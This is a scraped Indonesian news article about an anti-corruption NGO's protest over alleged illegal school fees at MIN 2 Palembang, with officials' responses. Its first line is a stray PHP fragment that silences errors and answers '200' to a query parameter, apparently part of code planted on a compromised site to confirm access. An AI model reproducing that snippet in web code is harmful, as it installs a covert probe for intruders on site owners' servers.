error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Sambangi Kemenag, Unras Presidium LSM Anti Korupsi Sumsel Pertanyakan Dugaan Pungli Di Sekolah MIN 2 Palembang - SMI.COM

Home / PALEMBANG

Jumat, 2 Desember 2022 - 14:17 WIB

Sambangi Kemenag, Unras Presidium LSM Anti Korupsi Sumsel Pertanyakan Dugaan Pungli Di Sekolah MIN 2 Palembang

Palembang, SMI-

Presidium LSM Anti Korupsi Sumatera Selatan(Sumsel) kembali melakukan aksi demo, kali ini demo dilakukan terkait dugaan adanya indikasi Pungutan Liar(Pungli) yang terjadi di MIN 2 Palembang.

Aksi demo berlangsung di Kantor Kementerian Agama(Kemenag) Kota Palembang, Jalan A.Yani, Kecamatan Seberang Ulu II, Kamis, 1/12/22.

Dalam suasana damai Harris.SB selaku koordinator aksi ketika menyuarakan aspirasinya mengatakan bahwa informasi dugaan pungli ini didapat oleh Presidium LSM Anti Korupsi Sumsel berdasarkan laporan beberapa wali murid untuk tahun ajaran 2021/2022.
Pada waktu itu wali murid dalam proses pendaftaran anak-anaknya masuk sekolah Madrasah Ibtidaiyah Negeri (MIN) 2 Palembang diharuskan menyumbang uang bangunan sebesar Rp.4 Juta, yang telah dikemukakan dalam rapat komite. Namun orang tua atau wali murid tidak diperkenankan untuk melakukan protes karena sudah diputuskan sepihak oleh Ketua Komite.

“Selain uang bangunan dari hasil rapat komite sebesar Rp.4 Juta tadi, ada lagi uang yang diduga terindikasi pungli berkedok perbaikan pintu toilet sebesar Rp.700 Ribu,” ujar Harris.SB.

Baca Juga :  Wakapolda Sumsel dampingi Ketua Tim Asistensi dan Supervisi Penanganan dan Antisipasi Karhutla tahun 2021

Harris menambahkan bahwa Presidium LSM Anti Korupsi Sumsel meminta kepada kepala kantor Kemenag Kota Palembang agar segera memanggil dan memintai keterangan Kepala Sekolah MIN 2 Palembang untuk dapat menjelaskan terkait dugaan – dugaan tersebut, dan apabila nantinya terdapat kebenaran atas adanya dugaan indikasi tersebut, agar secepatnya diproses untuk diberhentikan.

Ditempat yang sama, H. Abdul Rosyid selaku kepala kantor Kemenag Kota Palembang, saat menjumpai untuk memberikan penjelasan kepada massa aksi mengatakan, bahwa aksi demo ini merupakan sebagai bahan untuk melakukan pembinaan dan kroscek lapangan apakah semua yang disuarakan oleh Presidium LSM Anti Korupsi Sumsel dalam aksinya tersebut.

“Saya selaku kepala kantor Kemenag Kota Palembang mengucapkan terima kasih kepada rekan – rekan media juga LSM yang merupakan mitra kerja kita dan saya positif thingking atas masukan-masukan yang telah diberikan kepada saya,” ujar H. Abdul Rosyid.

Kita juga harus mengedepankan praduga tidak bersalah, rekan-rekan LSM menyampaikan ini dan insyallah setelah ini juga langsung kroscek ke sekolah untuk mengetahui lebih awal terhadap informasi yang sudah disampaikan, imbuhnya.

Baca Juga :  Buat Terobosan Di Awal Tahun 2022, Unit Kerja Srikandi PP Kecamatan Alang - Alang Lebar Adakan Giat Khitanan Massal

“Kita akan membentuk tim untuk menelusuri secara mendalam terkait informasi tadi, paling tidak saya paling serius menanggapi permasalahan ini, tambah H. Abdul Rosyid.

Kepala Sekolah MIN 2 Palembang, Listya Yustikarini SPd., MPd, melalui Kepala TU, Beni, saat dimintai keterangannya terkait aksi demo Presidium LSM Anti Korupsi Sumsel tersebut mengatakan bahwa tidak benar adanya pungli di MIN 2 Palembang.

“Jika itu terkait uang perbaikan pintu toilet sebesar Rp.700 Ribu memang ada, tetapi hanya sebatas wacana itupun inisiatif oknum di sekolah, tanpa sepengetahuan Kepala Madrasah dan itupun tidak jadi terlaksana karena ada salah satu wali murid yang sanggup dan bersedia secara pribadi untuk membantu perbaikan pintu toilet tersebut,” kata Beni.

Terkait dana atau sumbangan komite sebesar Rp.4 Juta untuk pembangunan gedung, Beni mengatakan bahwa dirinya tidak berkompeten untuk menjawab karena Komite yang melaksanakan.

(Chairuns)

Share :

Baca Juga

PALEMBANG

SYUKURAN HUT HUMAS POLRI KE 69 SEDERHANA NAMUN BERMAKNA

PALEMBANG

Forum Kertapati Bersatu Berbagi Takjil Di Bulan Ramadhan 1443 H

PALEMBANG

Dit Lantas Polda Sumsel melaksanakan Giat Binrohtal

PALEMBANG

Kapolda Monitoring Pos Pendekatan Desa Cinta Kasih Belimbing 

PALEMBANG

Golkar Sumsel Laksanakan Rakerda dan Rapimda, Siap Menghadapi Pemilu 2024

PALEMBANG

Safari Jurnalis, Plt. Kadis Kominfo Sumsel : Pembangunan Tanpa Pemberitaan Bagai Laut Tanpa Garam

PALEMBANG

Yansuri Prihatin Atas Tertangkap Saudara D Oleh BNN

PALEMBANG

AKBP Dalizon Setor Uang 300 Sampai 500 Juta Kepada Atasannya Di Polda Sumsel Itu Tidak Benar